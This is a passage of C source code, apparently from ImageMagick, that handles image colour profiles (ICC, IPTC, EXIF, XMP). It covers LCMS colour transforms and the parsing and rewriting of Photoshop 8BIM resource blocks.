0x8d, 0x31, 0x8d, 0x98, 0x8d, 0xff, 0x8e, 0x66, 0x8e, 0xce, 0x8f, 0x36,
0x8f, 0x9e, 0x90, 0x06, 0x90, 0x6e, 0x90, 0xd6, 0x91, 0x3f, 0x91, 0xa8,
0x92, 0x11, 0x92, 0x7a, 0x92, 0xe3, 0x93, 0x4d, 0x93, 0xb6, 0x94, 0x20,
0x94, 0x8a, 0x94, 0xf4, 0x95, 0x5f, 0x95, 0xc9, 0x96, 0x34, 0x96, 0x9f,
0x97, 0x0a, 0x97, 0x75, 0x97, 0xe0, 0x98, 0x4c, 0x98, 0xb8, 0x99, 0x24,
0x99, 0x90, 0x99, 0xfc, 0x9a, 0x68, 0x9a, 0xd5, 0x9b, 0x42, 0x9b, 0xaf,
0x9c, 0x1c, 0x9c, 0x89, 0x9c, 0xf7, 0x9d, 0x64, 0x9d, 0xd2, 0x9e, 0x40,
0x9e, 0xae, 0x9f, 0x1d, 0x9f, 0x8b, 0x9f, 0xfa, 0xa0, 0x69, 0xa0, 0xd8,
0xa1, 0x47, 0xa1, 0xb6, 0xa2, 0x26, 0xa2, 0x96, 0xa3, 0x06, 0xa3, 0x76,
0xa3, 0xe6, 0xa4, 0x56, 0xa4, 0xc7, 0xa5, 0x38, 0xa5, 0xa9, 0xa6, 0x1a,
0xa6, 0x8b, 0xa6, 0xfd, 0xa7, 0x6e, 0xa7, 0xe0, 0xa8, 0x52, 0xa8, 0xc4,
0xa9, 0x37, 0xa9, 0xa9, 0xaa, 0x1c, 0xaa, 0x8f, 0xab, 0x02, 0xab, 0x75,
0xab, 0xe9, 0xac, 0x5c, 0xac, 0xd0, 0xad, 0x44, 0xad, 0xb8, 0xae, 0x2d,
0xae, 0xa1, 0xaf, 0x16, 0xaf, 0x8b, 0xb0, 0x00, 0xb0, 0x75, 0xb0, 0xea,
0xb1, 0x60, 0xb1, 0xd6, 0xb2, 0x4b, 0xb2, 0xc2, 0xb3, 0x38, 0xb3, 0xae,
0xb4, 0x25, 0xb4, 0x9c, 0xb5, 0x13, 0xb5, 0x8a, 0xb6, 0x01, 0xb6, 0x79,
0xb6, 0xf0, 0xb7, 0x68, 0xb7, 0xe0, 0xb8, 0x59, 0xb8, 0xd1, 0xb9, 0x4a,
0xb9, 0xc2, 0xba, 0x3b, 0xba, 0xb5, 0xbb, 0x2e, 0xbb, 0xa7, 0xbc, 0x21,
0xbc, 0x9b, 0xbd, 0x15, 0xbd, 0x8f, 0xbe, 0x0a, 0xbe, 0x84, 0xbe, 0xff,
0xbf, 0x7a, 0xbf, 0xf5, 0xc0, 0x70, 0xc0, 0xec, 0xc1, 0x67, 0xc1, 0xe3,
0xc2, 0x5f, 0xc2, 0xdb, 0xc3, 0x58, 0xc3, 0xd4, 0xc4, 0x51, 0xc4, 0xce,
0xc5, 0x4b, 0xc5, 0xc8, 0xc6, 0x46, 0xc6, 0xc3, 0xc7, 0x41, 0xc7, 0xbf,
0xc8, 0x3d, 0xc8, 0xbc, 0xc9, 0x3a, 0xc9, 0xb9, 0xca, 0x38, 0xca, 0xb7,
0xcb, 0x36, 0xcb, 0xb6, 0xcc, 0x35, 0xcc, 0xb5, 0xcd, 0x35, 0xcd, 0xb5,
0xce, 0x36, 0xce, 0xb6, 0xcf, 0x37, 0xcf, 0xb8, 0xd0, 0x39, 0xd0, 0xba,
0xd1, 0x3c, 0xd1, 0xbe, 0xd2, 0x3f, 0xd2, 0xc1, 0xd3, 0x44, 0xd3, 0xc6,
0xd4, 0x49, 0xd4, 0xcb, 0xd5, 0x4e, 0xd5, 0xd1, 0xd6, 0x55, 0xd6, 0xd8,
0xd7, 0x5c, 0xd7, 0xe0, 0xd8, 0x64, 0xd8, 0xe8, 0xd9, 0x6c, 0xd9, 0xf1,
0xda, 0x76, 0xda, 0xfb, 0xdb, 0x80, 0xdc, 0x05, 0xdc, 0x8a, 0xdd, 0x10,
0xdd, 0x96, 0xde, 0x1c, 0xde, 0xa2, 0xdf, 0x29, 0xdf, 0xaf, 0xe0, 0x36,
0xe0, 0xbd, 0xe1, 0x44, 0xe1, 0xcc, 0xe2, 0x53, 0xe2, 0xdb, 0xe3, 0x63,
0xe3, 0xeb, 0xe4, 0x73, 0xe4, 0xfc, 0xe5, 0x84, 0xe6, 0x0d, 0xe6, 0x96,
0xe7, 0x1f, 0xe7, 0xa9, 0xe8, 0x32, 0xe8, 0xbc, 0xe9, 0x46, 0xe9, 0xd0,
0xea, 0x5b, 0xea, 0xe5, 0xeb, 0x70, 0xeb, 0xfb, 0xec, 0x86, 0xed, 0x11,
0xed, 0x9c, 0xee, 0x28, 0xee, 0xb4, 0xef, 0x40, 0xef, 0xcc, 0xf0, 0x58,
0xf0, 0xe5, 0xf1, 0x72, 0xf1, 0xff, 0xf2, 0x8c, 0xf3, 0x19, 0xf3, 0xa7,
0xf4, 0x34, 0xf4, 0xc2, 0xf5, 0x50, 0xf5, 0xde, 0xf6, 0x6d, 0xf6, 0xfb,
0xf7, 0x8a, 0xf8, 0x19, 0xf8, 0xa8, 0xf9, 0x38, 0xf9, 0xc7, 0xfa, 0x57,
0xfa, 0xe7, 0xfb, 0x77, 0xfc, 0x07, 0xfc, 0x98, 0xfd, 0x29, 0xfd, 0xba,
0xfe, 0x4b, 0xfe, 0xdc, 0xff, 0x6d, 0xff, 0xff
};
StringInfo
*profile;
MagickBooleanType
status;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (GetImageProfile(image,"icc") != (const StringInfo *) NULL)
return(MagickFalse);
profile=AcquireStringInfo(sizeof(sRGBProfile));
SetStringInfoDatum(profile,sRGBProfile);
status=SetImageProfile(image,"icc",profile);
profile=DestroyStringInfo(profile);
return(status);
}
MagickExport MagickBooleanType ProfileImage(Image *image,const char *name,
const void *datum,const size_t length,
const MagickBooleanType magick_unused(clone))
{
#define ProfileImageTag "Profile/Image"
#define ThrowProfileException(severity,tag,context) \
{ \
if (source_profile != (cmsHPROFILE) NULL) \
(void) cmsCloseProfile(source_profile); \
if (target_profile != (cmsHPROFILE) NULL) \
(void) cmsCloseProfile(target_profile); \
ThrowBinaryException(severity,tag,context); \
}
MagickBooleanType
status;
StringInfo
*profile;
magick_unreferenced(clone);
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
assert(name != (const char *) NULL);
if ((datum == (const void *) NULL) || (length == 0))
{
char
*next;
/*
Delete image profile(s).
*/
ResetImageProfileIterator(image);
for (next=GetNextImageProfile(image); next != (const char *) NULL; )
{
if (IsOptionMember(next,name) != MagickFalse)
{
(void) DeleteImageProfile(image,next);
ResetImageProfileIterator(image);
}
next=GetNextImageProfile(image);
}
return(MagickTrue);
}
/*
Add an ICC, IPTC, or generic profile to the image.
*/
status=MagickTrue;
profile=AcquireStringInfo((size_t) length);
SetStringInfoDatum(profile,(unsigned char *) datum);
if ((LocaleCompare(name,"icc") != 0) && (LocaleCompare(name,"icm") != 0))
status=SetImageProfile(image,name,profile);
else
{
const StringInfo
*icc_profile;
icc_profile=GetImageProfile(image,"icc");
if ((icc_profile != (const StringInfo *) NULL) &&
(CompareStringInfo(icc_profile,profile) == 0))
{
const char
*value;
value=GetImageProperty(image,"exif:ColorSpace");
(void) value;
if (LocaleCompare(value,"1") != 0)
(void) SetsRGBImageProfile(image);
value=GetImageProperty(image,"exif:InteroperabilityIndex");
if (LocaleCompare(value,"R98.") != 0)
(void) SetsRGBImageProfile(image);
/* Future.
value=GetImageProperty(image,"exif:InteroperabilityIndex");
if (LocaleCompare(value,"R03.") != 0)
(void) SetAdobeRGB1998ImageProfile(image);
*/
icc_profile=GetImageProfile(image,"icc");
}
if ((icc_profile != (const StringInfo *) NULL) &&
(CompareStringInfo(icc_profile,profile) == 0))
{
profile=DestroyStringInfo(profile);
return(MagickTrue);
}
#if !defined(MAGICKCORE_LCMS_DELEGATE)
(void) ThrowMagickException(&image->exception,GetMagickModule(),
MissingDelegateWarning,"DelegateLibrarySupportNotBuiltIn","`%s' (LCMS)",
image->filename);
#else
{
cmsHPROFILE
source_profile;
/*
Transform pixel colors as defined by the color profiles.
*/
cmsSetLogErrorHandler(LCMSExceptionHandler);
source_profile=cmsOpenProfileFromMemTHR((cmsContext) image,
GetStringInfoDatum(profile),(cmsUInt32Number)
GetStringInfoLength(profile));
if (source_profile == (cmsHPROFILE) NULL)
ThrowBinaryException(ResourceLimitError,
"ColorspaceColorProfileMismatch",name);
if ((cmsGetDeviceClass(source_profile) != cmsSigLinkClass) &&
(icc_profile == (StringInfo *) NULL))
status=SetImageProfile(image,name,profile);
else
{
CacheView
*image_view;
ColorspaceType
source_colorspace,
target_colorspace;
cmsColorSpaceSignature
signature;
cmsHPROFILE
target_profile;
cmsHTRANSFORM
*magick_restrict transform;
cmsUInt32Number
flags,
source_type,
target_type;
ExceptionInfo
*exception;
int
intent;
LCMSType
**magick_restrict source_pixels,
**magick_restrict target_pixels;
#if defined(LCMSHDRI)
LCMSType
source_scale,
target_scale;
#endif
MagickOffsetType
progress;
size_t
source_channels,
target_channels;
ssize_t
y;
exception=(&image->exception);
target_profile=(cmsHPROFILE) NULL;
if (icc_profile != (StringInfo *) NULL)
{
target_profile=source_profile;
source_profile=cmsOpenProfileFromMemTHR((cmsContext) image,
GetStringInfoDatum(icc_profile),(cmsUInt32Number)
GetStringInfoLength(icc_profile));
if (source_profile == (cmsHPROFILE) NULL)
ThrowProfileException(ResourceLimitError,
"ColorspaceColorProfileMismatch",name);
}
#if defined(LCMSHDRI)
source_scale=1.0;
#endif
source_channels=3;
switch (cmsGetColorSpace(source_profile))
{
case cmsSigCmykData:
{
source_colorspace=CMYKColorspace;
source_channels=4;
#if defined(LCMSHDRI)
source_type=(cmsUInt32Number) TYPE_CMYK_DBL;
source_scale=100.0;
#else
source_type=(cmsUInt32Number) TYPE_CMYK_16;
#endif
break;
}
case cmsSigGrayData:
{
source_colorspace=GRAYColorspace;
source_channels=1;
#if defined(LCMSHDRI)
source_type=(cmsUInt32Number) TYPE_GRAY_DBL;
#else
source_type=(cmsUInt32Number) TYPE_GRAY_16;
#endif
break;
}
case cmsSigLabData:
{
source_colorspace=LabColorspace;
#if defined(LCMSHDRI)
source_type=(cmsUInt32Number) TYPE_Lab_DBL;
source_scale=100.0;
#else
source_type=(cmsUInt32Number) TYPE_Lab_16;
#endif
break;
}
#if !defined(LCMSHDRI)
case cmsSigLuvData:
{
source_colorspace=YUVColorspace;
source_type=(cmsUInt32Number) TYPE_YUV_16;
break;
}
#endif
case cmsSigRgbData:
{
source_colorspace=sRGBColorspace;
#if defined(LCMSHDRI)
source_type=(cmsUInt32Number) TYPE_RGB_DBL;
#else
source_type=(cmsUInt32Number) TYPE_RGB_16;
#endif
break;
}
case cmsSigXYZData:
{
source_colorspace=XYZColorspace;
#if defined(LCMSHDRI)
source_type=(cmsUInt32Number) TYPE_XYZ_DBL;
#else
source_type=(cmsUInt32Number) TYPE_XYZ_16;
#endif
break;
}
#if !defined(LCMSHDRI)
case cmsSigYCbCrData:
{
source_colorspace=YUVColorspace;
source_type=(cmsUInt32Number) TYPE_YCbCr_16;
break;
}
#endif
default:
ThrowProfileException(ImageError,
"ColorspaceColorProfileMismatch",name);
}
(void) source_colorspace;
signature=cmsGetPCS(source_profile);
if (target_profile != (cmsHPROFILE) NULL)
signature=cmsGetColorSpace(target_profile);
#if defined(LCMSHDRI)
target_scale=1.0;
#endif
target_channels=3;
switch (signature)
{
case cmsSigCmykData:
{
target_colorspace=CMYKColorspace;
target_channels=4;
#if defined(LCMSHDRI)
target_type=(cmsUInt32Number) TYPE_CMYK_DBL;
target_scale=0.01;
#else
target_type=(cmsUInt32Number) TYPE_CMYK_16;
#endif
break;
}
case cmsSigGrayData:
{
target_colorspace=GRAYColorspace;
target_channels=1;
#if defined(LCMSHDRI)
target_type=(cmsUInt32Number) TYPE_GRAY_DBL;
#else
target_type=(cmsUInt32Number) TYPE_GRAY_16;
#endif
break;
}
case cmsSigLabData:
{
target_colorspace=LabColorspace;
#if defined(LCMSHDRI)
target_type=(cmsUInt32Number) TYPE_Lab_DBL;
target_scale=0.01;
#else
target_type=(cmsUInt32Number) TYPE_Lab_16;
#endif
break;
}
#if !defined(LCMSHDRI)
case cmsSigLuvData:
{
target_colorspace=YUVColorspace;
target_type=(cmsUInt32Number) TYPE_YUV_16;
break;
}
#endif
case cmsSigRgbData:
{
target_colorspace=sRGBColorspace;
#if defined(LCMSHDRI)
target_type=(cmsUInt32Number) TYPE_RGB_DBL;
#else
target_type=(cmsUInt32Number) TYPE_RGB_16;
#endif
break;
}
case cmsSigXYZData:
{
target_colorspace=XYZColorspace;
#if defined(LCMSHDRI)
target_type=(cmsUInt32Number) TYPE_XYZ_DBL;
#else
target_type=(cmsUInt32Number) TYPE_XYZ_16;
#endif
break;
}
default:
ThrowProfileException(ImageError,
"ColorspaceColorProfileMismatch",name);
}
switch (image->rendering_intent)
{
case AbsoluteIntent: intent=INTENT_ABSOLUTE_COLORIMETRIC; break;
case PerceptualIntent: intent=INTENT_PERCEPTUAL; break;
case RelativeIntent: intent=INTENT_RELATIVE_COLORIMETRIC; break;
case SaturationIntent: intent=INTENT_SATURATION; break;
default: intent=INTENT_PERCEPTUAL; break;
}
flags=cmsFLAGS_HIGHRESPRECALC;
#if defined(cmsFLAGS_BLACKPOINTCOMPENSATION)
if (image->black_point_compensation != MagickFalse)
flags|=cmsFLAGS_BLACKPOINTCOMPENSATION;
#endif
transform=AcquireTransformThreadSet(image,source_profile,
source_type,target_profile,target_type,intent,flags);
if (transform == (cmsHTRANSFORM *) NULL)
ThrowProfileException(ImageError,"UnableToCreateColorTransform",
name);
/*
Transform image as dictated by the source & target image profiles.
*/
source_pixels=AcquirePixelThreadSet(image->columns,source_channels);
target_pixels=AcquirePixelThreadSet(image->columns,target_channels);
if ((source_pixels == (LCMSType **) NULL) ||
(target_pixels == (LCMSType **) NULL))
{
target_pixels=DestroyPixelThreadSet(target_pixels);
source_pixels=DestroyPixelThreadSet(source_pixels);
transform=DestroyTransformThreadSet(transform);
ThrowProfileException(ResourceLimitError,
"MemoryAllocationFailed",image->filename);
}
if (SetImageStorageClass(image,DirectClass) == MagickFalse)
{
target_pixels=DestroyPixelThreadSet(target_pixels);
source_pixels=DestroyPixelThreadSet(source_pixels);
transform=DestroyTransformThreadSet(transform);
if (source_profile != (cmsHPROFILE) NULL)
(void) cmsCloseProfile(source_profile);
if (target_profile != (cmsHPROFILE) NULL)
(void) cmsCloseProfile(target_profile);
return(MagickFalse);
}
if (target_colorspace == CMYKColorspace)
(void) SetImageColorspace(image,target_colorspace);
progress=0;
image_view=AcquireAuthenticCacheView(image,exception);
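/*
Each OpenMP thread works with its own LCMS transform and scratch rows
(both indexed by the thread id), so the row loop below needs no
locking around cmsDoTransform().
*/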
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(static) shared(status) \
magick_number_threads(image,image,image->rows,1)
#endif
for (y=0; y < (ssize_t) image->rows; y++)
{
const int
id = GetOpenMPThreadId();
MagickBooleanType
sync;
register IndexPacket
*magick_restrict indexes;
register LCMSType
*p;
register PixelPacket
*magick_restrict q;
register ssize_t
x;
if (status == MagickFalse)
continue;
q=GetCacheViewAuthenticPixels(image_view,0,y,image->columns,1,
exception);
if (q == (PixelPacket *) NULL)
{
status=MagickFalse;
continue;
}
indexes=GetCacheViewAuthenticIndexQueue(image_view);
p=source_pixels[id];
for (x=0; x < (ssize_t) image->columns; x++)
{
*p++=LCMSScaleSource(GetPixelRed(q));
if (source_channels > 1)
{
*p++=LCMSScaleSource(GetPixelGreen(q));
*p++=LCMSScaleSource(GetPixelBlue(q));
}
if (source_channels > 3)
*p++=LCMSScaleSource(GetPixelIndex(indexes+x));
q++;
}
cmsDoTransform(transform[id],source_pixels[id],target_pixels[id],
(unsigned int) image->columns);
p=target_pixels[id];
q-=image->columns; /* rewind to the start of this row before writing */
for (x=0; x < (ssize_t) image->columns; x++)
{
SetPixelRed(q,LCMSScaleTarget(*p));
SetPixelGreen(q,GetPixelRed(q)); /* replicate red so single-channel */
SetPixelBlue(q,GetPixelRed(q)); /* (gray) targets yield a gray pixel */
p++;
if (target_channels > 1)
{
SetPixelGreen(q,LCMSScaleTarget(*p));
p++;
SetPixelBlue(q,LCMSScaleTarget(*p));
p++;
}
if (target_channels > 3)
{
SetPixelIndex(indexes+x,LCMSScaleTarget(*p));
p++;
}
q++;
}
sync=SyncCacheViewAuthenticPixels(image_view,exception);
if (sync == MagickFalse)
status=MagickFalse;
if (image->progress_monitor != (MagickProgressMonitor) NULL)
{
MagickBooleanType
proceed;
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp critical (MagickCore_ProfileImage)
#endif
proceed=SetImageProgress(image,ProfileImageTag,progress++,
image->rows);
if (proceed == MagickFalse)
status=MagickFalse;
}
}
image_view=DestroyCacheView(image_view);
(void) SetImageColorspace(image,target_colorspace);
switch (signature)
{
case cmsSigRgbData:
{
image->type=image->matte == MagickFalse ? TrueColorType :
TrueColorMatteType;
break;
}
case cmsSigCmykData:
{
image->type=image->matte == MagickFalse ? ColorSeparationType :
ColorSeparationMatteType;
break;
}
case cmsSigGrayData:
{
image->type=image->matte == MagickFalse ? GrayscaleType :
GrayscaleMatteType;
break;
}
default:
break;
}
target_pixels=DestroyPixelThreadSet(target_pixels);
source_pixels=DestroyPixelThreadSet(source_pixels);
transform=DestroyTransformThreadSet(transform);
if ((status != MagickFalse) &&
(cmsGetDeviceClass(source_profile) != cmsSigLinkClass))
status=SetImageProfile(image,name,profile);
if (target_profile != (cmsHPROFILE) NULL)
(void) cmsCloseProfile(target_profile);
}
(void) cmsCloseProfile(source_profile);
}
#endif
}
profile=DestroyStringInfo(profile);
return(status);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% R e m o v e I m a g e P r o f i l e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% RemoveImageProfile() removes a named profile from the image and returns its
% value.
%
% The format of the RemoveImageProfile method is:
%
% void *RemoveImageProfile(Image *image,const char *name)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o name: the profile name.
%
*/
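/*
A minimal usage sketch (image is assumed to be a valid Image handle);
the caller owns the returned StringInfo and must destroy it:

StringInfo
*profile;

profile=RemoveImageProfile(image,"icc");
if (profile != (StringInfo *) NULL)
profile=DestroyStringInfo(profile);
*/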
MagickExport StringInfo *RemoveImageProfile(Image *image,const char *name)
{
StringInfo
*profile;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
if (image->profiles == (SplayTreeInfo *) NULL)
return((StringInfo *) NULL);
if (LocaleCompare(name,"icc") == 0)
{
/*
Continue to support deprecated color profile for now.
*/
image->color_profile.length=0;
image->color_profile.info=(unsigned char *) NULL;
}
if (LocaleCompare(name,"iptc") == 0)
{
/*
Continue to support deprecated IPTC profile for now.
*/
image->iptc_profile.length=0;
image->iptc_profile.info=(unsigned char *) NULL;
}
WriteTo8BimProfile(image,name,(StringInfo *) NULL);
profile=(StringInfo *) RemoveNodeFromSplayTree((SplayTreeInfo *)
image->profiles,name);
return(profile);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
%   R e s e t I m a g e P r o f i l e I t e r a t o r                        %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% ResetImageProfileIterator() resets the image profile iterator. Use it in
% conjunction with GetNextImageProfile() to iterate over all the profiles
% associated with an image.
%
% The format of the ResetImageProfileIterator method is:
%
% ResetImageProfileIterator(Image *image)
%
% A description of each parameter follows:
%
% o image: the image.
%
*/
MagickExport void ResetImageProfileIterator(const Image *image)
{
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
if (image->profiles == (SplayTreeInfo *) NULL)
return;
ResetSplayTreeIterator((SplayTreeInfo *) image->profiles);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% S e t I m a g e P r o f i l e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% SetImageProfile() adds a named profile to the image. If a profile with the
% same name already exists, it is replaced. This method differs from the
% ProfileImage() method in that it does not apply CMS color profiles.
%
% The format of the SetImageProfile method is:
%
% MagickBooleanType SetImageProfile(Image *image,const char *name,
% const StringInfo *profile)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o name: the profile name, for example icc, exif, and 8bim (8bim is the
% Photoshop wrapper for iptc profiles).
%
% o profile: A StringInfo structure that contains the named profile.
%
*/
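/*
A minimal usage sketch (icc_blob and icc_length are assumed to hold a
raw ICC profile obtained elsewhere); SetImageProfile() clones the
profile, so the local copy is destroyed afterwards:

StringInfo
*profile;

profile=BlobToStringInfo(icc_blob,icc_length);
(void) SetImageProfile(image,"icc",profile);
profile=DestroyStringInfo(profile);
*/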
static void *DestroyProfile(void *profile)
{
return((void *) DestroyStringInfo((StringInfo *) profile));
}
static inline const unsigned char *ReadResourceByte(const unsigned char *p,
unsigned char *quantum)
{
*quantum=(*p++);
return(p);
}
static inline const unsigned char *ReadResourceLong(const unsigned char *p,
unsigned int *quantum)
{
*quantum=(unsigned int) (*p++) << 24;
*quantum|=(unsigned int) (*p++) << 16;
*quantum|=(unsigned int) (*p++) << 8;
*quantum|=(unsigned int) (*p++);
return(p);
}
static inline const unsigned char *ReadResourceShort(const unsigned char *p,
unsigned short *quantum)
{
*quantum=(unsigned short) (*p++) << 8;
*quantum|=(unsigned short) (*p++);
return(p);
}
static inline void WriteResourceLong(unsigned char *p,
const unsigned int quantum)
{
unsigned char
buffer[4];
buffer[0]=(unsigned char) (quantum >> 24);
buffer[1]=(unsigned char) (quantum >> 16);
buffer[2]=(unsigned char) (quantum >> 8);
buffer[3]=(unsigned char) quantum;
(void) memcpy(p,buffer,4);
}
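/*
8BIM resource layout assumed by the parsers below: a 4-byte signature
"8BIM", a 2-byte resource id, a Pascal-style name (length byte plus
bytes, padded to an even size), a 4-byte data length, and the data
itself (also padded to an even size).
*/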
static void WriteTo8BimProfile(Image *image,const char *name,
const StringInfo *profile)
{
const unsigned char
*datum,
*q;
register const unsigned char
*p;
size_t
length;
StringInfo
*profile_8bim;
ssize_t
count;
unsigned char
length_byte;
unsigned int
value;
unsigned short
id,
profile_id;
if (LocaleCompare(name,"icc") == 0)
profile_id=0x040f;
else
if (LocaleCompare(name,"iptc") == 0)
profile_id=0x0404;
else
if (LocaleCompare(name,"xmp") == 0)
profile_id=0x0424;
else
return;
profile_8bim=(StringInfo *) GetValueFromSplayTree((SplayTreeInfo *)
image->profiles,"8bim");
if (profile_8bim == (StringInfo *) NULL)
return;
datum=GetStringInfoDatum(profile_8bim);
length=GetStringInfoLength(profile_8bim);
for (p=datum; p < (datum+length-16); )
{
q=p;
if (LocaleNCompare((char *) p,"8BIM",4) != 0)
break;
p+=4;
p=ReadResourceShort(p,&id);
p=ReadResourceByte(p,&length_byte);
p+=length_byte;
if (((length_byte+1) & 0x01) != 0)
p++;
if (p > (datum+length-4))
break;
p=ReadResourceLong(p,&value);
count=(ssize_t) value;
if ((count & 0x01) != 0)
count++;
if ((count < 0) || (p > (datum+length-count)) || (count > (ssize_t) length))
break;
if (id != profile_id)
p+=count;
else
{
size_t
extent,
offset;
ssize_t
extract_extent;
StringInfo
*extract_profile;
extract_extent=0;
extent=(datum+length)-(p+count);
if (profile == (StringInfo *) NULL)
{
offset=(q-datum);
extract_profile=AcquireStringInfo(offset+extent);
(void) memcpy(extract_profile->datum,datum,offset);
}
else
{
offset=(p-datum);
extract_extent=profile->length;
if ((extract_extent & 0x01) != 0)
extract_extent++;
extract_profile=AcquireStringInfo(offset+extract_extent+extent);
(void) memcpy(extract_profile->datum,datum,offset-4);
WriteResourceLong(extract_profile->datum+offset-4,(unsigned int)
profile->length);
(void) memcpy(extract_profile->datum+offset,
profile->datum,profile->length);
}
(void) memcpy(extract_profile->datum+offset+extract_extent,
p+count,extent);
(void) AddValueToSplayTree((SplayTreeInfo *) image->profiles,
ConstantString("8bim"),CloneStringInfo(extract_profile));
extract_profile=DestroyStringInfo(extract_profile);
break;
}
}
}
static void GetProfilesFromResourceBlock(Image *image,
const StringInfo *resource_block)
{
const unsigned char
*datum;
register const unsigned char
*p;
size_t
length;
ssize_t
count;
StringInfo
*profile;
unsigned char
length_byte;
unsigned int
value;
unsigned short
id;
datum=GetStringInfoDatum(resource_block);
length=GetStringInfoLength(resource_block);
for (p=datum; p < (datum+length-16); )
{
if (LocaleNCompare((char *) p,"8BIM",4) != 0)
break;
p+=4;
p=ReadResourceShort(p,&id);
p=ReadResourceByte(p,&length_byte);
p+=length_byte;
if (((length_byte+1) & 0x01) != 0)
p++;
if (p > (datum+length-4))
break;
p=ReadResourceLong(p,&value);
count=(ssize_t) value;
if ((p > (datum+length-count)) || (count > (ssize_t) length) || (count < 0))
break;
switch (id)
{
case 0x03ed:
{
unsigned int
resolution;
unsigned short
units;
/*
Resolution.
*/
if (count < 10)
break;
p=ReadResourceLong(p,&resolution);
image->x_resolution=((double) resolution)/65536.0;
p=ReadResourceShort(p,&units)+2;
p=ReadResourceLong(p,&resolution)+4;
image->y_resolution=((double) resolution)/65536.0;
/*
Values are always stored as pixels per inch.
*/
if ((ResolutionType) units != PixelsPerCentimeterResolution)
image->units=PixelsPerInchResolution;
else
{
image->units=PixelsPerCentimeterResolution;
image->x_resolution/=2.54;
image->y_resolution/=2.54;
}
break;
}
case 0x0404:
{
/*
IPTC Profile
*/
profile=AcquireStringInfo(count);
SetStringInfoDatum(profile,p);
(void) SetImageProfileInternal(image,"iptc",profile,MagickTrue);
profile=DestroyStringInfo(profile);
p+=count;
break;
}
case 0x040c:
{
/*
Thumbnail.
*/
p+=count;
break;
}
case 0x040f:
{
/*
ICC Profile.
*/
profile=AcquireStringInfo(count);
SetStringInfoDatum(profile,p);
(void) SetImageProfileInternal(image,"icc",profile,MagickTrue);
profile=DestroyStringInfo(profile);
p+=count;
break;
}
case 0x0422:
{
/*
EXIF Profile.
*/
profile=AcquireStringInfo(count);
SetStringInfoDatum(profile,p);
(void) SetImageProfileInternal(image,"exif",profile,MagickTrue);
profile=DestroyStringInfo(profile);
p+=count;
break;
}
case 0x0424:
{
/*
XMP Profile.
*/
profile=AcquireStringInfo(count);
SetStringInfoDatum(profile,p);
(void) SetImageProfileInternal(image,"xmp",profile,MagickTrue);
profile=DestroyStringInfo(profile);
p+=count;
break;
}
default:
{
p+=count;
break;
}
}
if ((count & 0x01) != 0)
p++;
}
}
static MagickBooleanType SetImageProfileInternal(Image *image,const char *name,
const StringInfo *profile,const MagickBooleanType recursive)
{
char
key[MaxTextExtent],
property[MaxTextExtent];
MagickBooleanType
status;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
if (image->profiles == (SplayTreeInfo *) NULL)
image->profiles=NewSplayTree(CompareSplayTreeString,RelinquishMagickMemory,
DestroyProfile);
(void) CopyMagickString(key,name,MaxTextExtent);
LocaleLower(key);
status=AddValueToSplayTree((SplayTreeInfo *) image->profiles,
ConstantString(key),CloneStringInfo(profile));
if ((status != MagickFalse) &&
((LocaleCompare(name,"icc") == 0) || (LocaleCompare(name,"icm") == 0)))
{
const StringInfo
*icc_profile;
/*
Continue to support deprecated color profile member.
*/
icc_profile=GetImageProfile(image,name);
if (icc_profile != (const StringInfo *) NULL)
{
image->color_profile.length=GetStringInfoLength(icc_profile);
image->color_profile.info=GetStringInfoDatum(icc_profile);
}
}
if ((status != MagickFalse) &&
((LocaleCompare(name,"iptc") == 0) || (LocaleCompare(name,"8bim") == 0)))
{
const StringInfo
*iptc_profile;
/*
Continue to support deprecated IPTC profile member.
*/
iptc_profile=GetImageProfile(image,name);
if (iptc_profile != (const StringInfo *) NULL)
{
image->iptc_profile.length=GetStringInfoLength(iptc_profile);
image->iptc_profile.info=GetStringInfoDatum(iptc_profile);
}
}
if (status != MagickFalse)
{
if (LocaleCompare(name,"8bim") == 0)
GetProfilesFromResourceBlock(image,profile);
else
if (recursive == MagickFalse)
WriteTo8BimProfile(image,name,profile);
}
/*
Inject profile into image properties.
*/
(void) FormatLocaleString(property,MaxTextExtent,"%s:*",name);
(void) GetImageProperty(image,property);
return(status);
}
MagickExport MagickBooleanType SetImageProfile(Image *image,const char *name,
const StringInfo *profile)
{
return(SetImageProfileInternal(image,name,profile,MagickFalse));
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% S y n c I m a g e P r o f i l e s %
% %
% %
% %
